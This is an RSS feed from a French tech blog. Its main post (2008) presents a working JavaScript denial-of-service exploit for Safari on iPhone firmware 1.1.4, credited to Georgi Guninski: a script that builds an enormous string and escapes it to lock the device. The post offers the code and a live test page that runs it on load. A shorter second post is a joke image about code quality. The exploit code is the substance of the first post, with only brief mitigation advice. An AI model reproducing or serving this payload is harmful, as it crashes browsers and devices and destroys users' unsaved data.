<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>Debian or not to be ? 2.0 &#187; code</title> <atom:link href="http://www.crashdump.fr/tag/code/feed/" rel="self" type="application/rss+xml" /><link>http://www.crashdump.fr</link> <description>that is the question</description> <lastBuildDate>Mon, 23 Jan 2012 13:14:39 +0000</lastBuildDate> <language>fr</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=</generator> <item><title>iPhone &#8211; Exploit DoS Safari, ça commence !</title><link>http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/</link> <comments>http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/#comments</comments> <pubDate>Wed, 23 Apr 2008 16:33:54 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[iPhone]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[code]]></category> <category><![CDATA[crash]]></category> <category><![CDATA[DoS]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[Georgi Guninski]]></category> <category><![CDATA[remote execution]]></category> <category><![CDATA[Safari]]></category> <category><![CDATA[verrouillage]]></category><guid isPermaLink="false">http://blog.crashdump.fr/?p=99</guid> <description><![CDATA[l&#8217;iPhone est censé être une plateforme sécurisé tant les données qui peuvent être stockées sur la machine sont confidentielles &#8211; imaginez que n&#8217;importe qui puisse avoir accès a vos contact, mail ou sms. Apple a du faire de son mieux, mais rien n&#8217;est parfait. Un exploit touchant le navigateur web (Safari) a été découvert récemment, [...]]]></description> <content:encoded><![CDATA[<p>l&#8217;iPhone est censé être une plateforme sécurisé tant les données qui peuvent être stockées sur la machine sont confidentielles &#8211; imaginez que n&#8217;importe qui puisse avoir accès a vos contact, mail ou sms. Apple a du faire de son mieux, mais rien n&#8217;est parfait. Un exploit touchant le navigateur web (Safari) a été découvert récemment, un exploit dangereux pour ce smart phone, tant au niveau sécurité que au niveau de la mauvaise publicité qui peut en découler.</p><p>Le code que je vous propose ci dessous n&#8217;est pas complet, il a été modifié depuis l&#8217;une des premières version de l&#8217;exploit pour Safari sur Mac. Il suffit de se rendre sur la page contenant  le code malicieux avec votre iPhone pour qu&#8217;il le verrouille.<br /> <span id="more-99"></span></p><li><h2>remote execution DoS vulnerability:</h2></li><p><em>Le code que je met a votre disposition ici l&#8217;est juste a titre d&#8217;exemple (de même pour la page de test..), je ne serais donc pas responsable &#8211; quoi qu&#8217;il se passe &#8211; de ce qu&#8217;il pourrais arriver si vous ouvrez la page. Si vous voulez quand même tenter l&#8217;aventure, gardez a l&#8217;esprit que l&#8217;iPhone va complètement se verrouiller et vous perdrez donc toutes les données des applications lancées a ce moment là.</em></p><div class="codecolorer-container text default javascript" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:450px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br />4<br />5<br />6<br />7<br />8<br />9<br />10<br />11<br />12<br />13<br />14<br />15<br />16<br />17<br />18<br />19<br />20<br />21<br />22<br />23<br />24<br />25<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&lt;html&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; Copyright Georgi Guninski<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;br&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; Cannot be used in vulnerability databases<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;br&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; Especially securityfocus/mitre/cve/cert<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;script&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; var s=String.fromCharCode(257);<br /> &nbsp; &nbsp; &nbsp; &nbsp; var ki=&quot;&quot;;<br /> &nbsp; &nbsp; &nbsp; &nbsp; var me=&quot;&quot;;<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;1024; i++){<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ki=ki+s;<br /> &nbsp; &nbsp; &nbsp; &nbsp; }<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;1024; i++){<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; me=me+ki;<br /> &nbsp; &nbsp; &nbsp; &nbsp; }<br /> &nbsp; &nbsp; &nbsp; &nbsp; var ov=s;<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;28; i++) ov += ov;<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;88; i++) ov += me;<br /> &nbsp; &nbsp; &nbsp; &nbsp; alert(&quot;done generating&quot;);<br /> &nbsp; &nbsp; &nbsp; &nbsp; var fuckbill=escape(ov);<br /> &nbsp; &nbsp; &nbsp; &nbsp; alert(&quot;done escape&quot;);<br /> &nbsp; &nbsp; &nbsp; &nbsp; alert(fuckbill);<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;/script&gt;<br /> &lt;/html&gt;</div></td></tr></tbody></table></div><p>La vulnérabilité a été testée sur un firmware 1.1.4, mais elle est surement exploitable sur des versions antérieures (Laissez moi donc un commentaire si vous l&#8217;avez testé !).</p><p>Malheureusement les firmwares ne sont mis a jours que très rarement sur l&#8217;iPhone et même si l&#8217;exploit a déjà été fixé sur les autres plateformes, il faudra surement attendre la &laquo;&nbsp;version 2&#8243; (surement cet été) pour pouvoir en profiter ! Je vous conseille donc de désactiver le Javascript.</p><p>Voici le lien pour télécharger le code au format texte.<br /> Qu&#8217;importe les risques, vous voulez tenter l&#8217;aventure ? Cliquez ici ! (Attention, le simple fait de charger la page va exécuter le code malicieux !)</p><p>Même si la faille a été corrigée sur les dernières version de Safari disponibles au téléchargement, la version iPhone est toujours vulnérable.. on espère donc une mise a jours rapide de notre navigateur mobile préféré !</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Mesure de la qualitée du code</title><link>http://www.crashdump.fr/tout-et-rien/mesure-de-la-qualitee-du-code-124/</link> <comments>http://www.crashdump.fr/tout-et-rien/mesure-de-la-qualitee-du-code-124/#comments</comments> <pubDate>Sun, 13 Apr 2008 18:49:56 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Tout-et-Rien]]></category> <category><![CDATA[code]]></category> <category><![CDATA[debug]]></category> <category><![CDATA[drole]]></category> <category><![CDATA[mesure]]></category> <category><![CDATA[qualitée]]></category><guid isPermaLink="false">http://blog.crashdump.fr/?p=124</guid> <description><![CDATA[ça se passe de commentaires ;)]]></description> <content:encoded><![CDATA[<p><a href='http://www.crashdump.fr/wp-content/uploads/2008/04/wtfm.jpg'><img src="http://www.crashdump.fr/wp-content/uploads/2008/04/wtfm.jpg" alt="" title="wtfm" width="350" height="321" class="alignnone size-medium wp-image-125" /></a></p><p>ça se passe de commentaires ;)</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/tout-et-rien/mesure-de-la-qualitee-du-code-124/feed/</wfw:commentRss> <slash:comments>1</slash:comments> </item> </channel> </rss>
<!-- Served from: www.crashdump.fr @ 2012-02-04 20:05:55 by W3 Total Cache -->
